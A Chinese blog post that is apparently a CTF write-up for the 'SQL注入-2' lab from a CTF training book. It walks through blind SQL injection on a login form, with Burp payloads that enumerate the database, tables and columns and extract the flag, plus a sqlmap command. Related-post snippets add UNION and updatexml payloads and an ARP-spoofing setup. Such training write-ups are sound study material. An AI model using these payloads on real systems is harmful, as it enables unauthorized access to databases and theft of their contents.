0到1 ctfer: SQL注入-2

最新推荐文章于 2024-02-26 21:00:10 发布
最新推荐文章于 2024-02-26 21:00:10 发布
阅读量1.7k 收藏 4
点赞数
分类专栏: 网络安全学习 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120009825
版权

分析这个靶场 :
登录靶场,只有一个空空的界面:
image
很明显,这是一个登录到账号密码的关于SQL注入的题目
尝试输入admin和其他用户名,发现是不一样的报错:
image
image
说明这里的机制是:先检查账号是否存在,再检查账号和密码是否对应
由此可以使用burpsuite抓包进行报错注入的操作:
经过抓包,在burp上显示不同的内容:
“账号不存在”
image
“账号和密码错误”
image
所以由此可以判断出,账号密码是否正确,来源于报错:

  • 用户名正确报错:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}
  • 用户名不存在报错:{“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"}

依据此信息可以对其进行报错注入:
#手工方法:

判断数据库:

使用burpsuite加上合适的payload即可:

判断数据库名称的字符数
经过尝试,数据库名称字符数为4

name=admin'+and+if(length(database())=4,true,false)%23&pass=a

判断数据库名称:
用intruder暴力破解数据库名称:

name=admin'+and+substr(database(),1,1)='f'%23&pass=a

image
image
得到数据库名称为note

判断表名
就不进行表的位数判断了,直接上intruder
暴力破解数据表名:

name=admin'+AND+substr((SELECT+group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()),1,1)='f'%23

经过测试,最好SQL语句的操作是大写,存在过滤小写的过滤器
image
表名称有两个:fl4g和users

判断列名:
暴力破解列名称:

name=admin'+AND+substr((SELECT+group_concat(column_name)+FROM+information_schema.columns+WHERE+table_schema=database()),1,1)='f'%23

image
image
四列:flag,id,username,passwords

找出flag
flag的值应该存在于数据表为fl4g的flag列,注意修改字典,要添加数字和一些特殊符号进去

name=admin'+AND+substr((SELECT+group_concat(flag)+FROM+flag),1,1)='a'%23

image
image
flag就可以出来了:n1book{login_sqli_is_nice}

sqlmap

将抓到带有SQL注入的数据包保存到文件中
image
image
使用sqlmap打开,并用-p指定参数name为注入点

sqlmap -r 'a.txt' -p name --batch

之后再加上一些参数爆破出一些东西就不赘述了

Zeker62
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入演示:解决SQL注入 - 直接运行jar包
08-09
SQL注入演示:存在SQL注入 - 直接运行jar包
《从0到1:CTFer成长之路》SQL注入-2
ZhShy
01-11 864
靶场:SQL注入-2 知识点 burpsuit使用方法 首先为浏览器设置proxy代理,127.0.0.1:8080 在burp的proxy选项中打开intercept is on 在浏览器中访问网址,burp自动抓包,按ctrl+r发送至repeater选项 在repeater中进行修改,send后可在右栏查看返回内容 sql注入方法 测试是否存在注入点 按表名、列名、字段顺序依次查找 解题思路 1. 根据提示,访问login或user login.php 查看页面源代码,发现
[第一章 web入门]SQL注入-2 题目分析与详解
最新发布
2302_79800344的博客
02-26 851
一、题目简介。
《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2
weixin_46703850的博客
02-21 1001
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
从零开始SQL注入之二
tonghua6的专栏
03-21 504
转载自:http://lightless.me/archives/zero-to-n-sqli-2.html 0x00 废话 又是废话环节,今天我们就开始实战吧。当然这是不可能的,在开始之前我还要废话一些东西,不过离实战不远了。 0x01 理解SQL注入 怎么又是理解SQL注入,作者你是出来坑爹的吧! 不要慌,上一次我们只是通俗的讲了什么是SQL注入,大家
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 392
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
SQL注入演示:存在SQL注入 - 直接运行jar包
08-09
SQL注入演示:存在SQL注入 - 直接运行jar包
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
SQLSQL-92,SQL-99和SQL-2003的BNF语法
01-30
SQLSQL-92,SQL-99和SQL-2003的BNF语法
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
#简要明确参数类型数字,字符,搜索,JSON 等#简要明确请求方法GET,POST,COOKIE,REQUEST,HTTP 头等其中 SQL 语句干扰符号:',
简单的SQL注入2
雨九九的小窝
10-25 696
地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html 1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信...
《从0到1:CTFer成长之路》——SQL
akxnxbshai的博客
03-14 758
SQL1: 首先判断有无过滤或者过滤了那些东西。 首先尝试1‘ --+,发现有回显,说明—没有被过滤,可以使用(也可以用%23) 先查看有几列: 1' order by 4 --+ 到4的时候无回显,说明只有3列。 试着查看数据名。 -1' union select database(),2,3 --+ 发现回显了2,3,所以再试一下放到前边。 -1' union select 2,3,database() --+ 数据库名为note,接下来爆破表名。 -1' union
2021-07-08 CTFer成长之路-SQL注入-总结
热门推荐
时光隧道
07-08 5万+
注入的功效 前面讲述了SQL注入的基础和绕过的方法,那么,注入到底有什么用呢?结合作者的实战经验,总结如下。 ❖ 在有写文件权限的情况下,直接用INTO OUTFILE或者DUMPFILE向Web目录写文件,或者写文件后结合文件包含漏洞达到代码执行的效果,见图1-2-53。 ❖ 在有读文件权限的情况下,用load_file()函数读取网站源码和配置信息,获取敏感数据。 ❖ 提升权限,获得更高的用户权限或者管理员权限,绕过登录,添加用户,调整用户权限等,从而拥有更多的网站功能。 ❖ 通过注入控制数据库查询出来
漏洞扫描:AWVS使用方法
Zeker62的博客
08-02 2万+
安装AWVS: 推荐一个大佬的AWVS的安装博客 https://www.sqlsec.com/2020/04/awvs.html 我使用的是docker版本的,其他的我觉得太麻烦了。 根据博客所述,我将AWVS安装在kali虚拟机上 但是我并不想在kali上运行,因为kali实在是有些慢。 在Windows上使用awvs 找到kali的IP地址是:192.168.43.238 打开我们喜欢的浏览器 输入:https://192.168.43.238:13443/ 输入账号密码(都在第一个链接的大佬博客
ARP欺骗:使用工具:arpspoof、driftnet和ettercap
Zeker62的博客
07-21 7065
作为一个小白,下午两点钟去听了一个网络公开课,了解了一下两个工具的使用,他也给我复习了一下arp欺骗。 ARP欺骗俗称ARP中间人攻击 防范方法 简而言之,就是骗取受害主机误认为是网关,然后把流量数据发给攻击方,攻击方可以截获流量数据。 攻击条件: 攻击方要知道被攻击方的IP地址,以及被攻击方的网关地址 攻击方和被攻击方处于同一局域网下 开始一定要设置一下路由转发 echo 1 > /proc/sys/net/ipv4/ip_forward 这个是表示数据包能否转发,这个都不开,那直接白给
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 6622
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
CSF三层主机:渗透测试靶场笔记
Zeker62的博客
03-27 5581
测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略。
PHP渗透测试题目笔记
Zeker62的博客
02-10 5397
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
从0到1:CTFer成长之路 sql注入1
07-27
CTFer成长之路中,SQL注入是一个重要的技术点。SQL注入是一种利用用户输入数据不当,从而欺骗数据库执行恶意操作的攻击方式。在CTF比赛中,了解和掌握SQL注入技术可以帮助你解决一些与数据库相关的题目。 首先,你需要了解SQL注入的原理和基本概念。SQL注入通常发生在应用程序与数据库之间的交互过程中。当应用程序未能正确过滤用户输入数据,并且将用户输入直接拼接到SQL查询语句中时,攻击者可以通过构造恶意输入来修改、删除或绕过原本应该执行的查询操作,从而获取敏感信息或控制数据库。 接下来,你需要学习一些常见的SQL注入技巧和工具。例如,可以使用单引号 `'` 来进行字符串注入,使用注释符 `--` 来注释掉原本的查询语句,使用 UNION 语句来进行查询结果的合并等等。同时,了解一些常见的防御措施,如参数化查询、输入验证和输出编码等,可以帮助你更好地理解和应对SQL注入攻击。 在实践中,你可以尝试挑战一些有关SQL注入的CTF题目。这些题目通常会提供一个具有漏洞的应用程序和一个数据库,你需要通过利用SQL注入漏洞来获取敏感信息或执行特定操作。通过解决这些题目,你可以加深对SQL注入的理解,并且熟悉常见的攻击场景和解决方法。 最后,记得在学习和实践过程中保持合法合规。只在合法授权的情况下进行演练和挑战,切勿用于非法用途。同时,及时更新和修补应用程序的漏洞,以保护自己和他人的信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值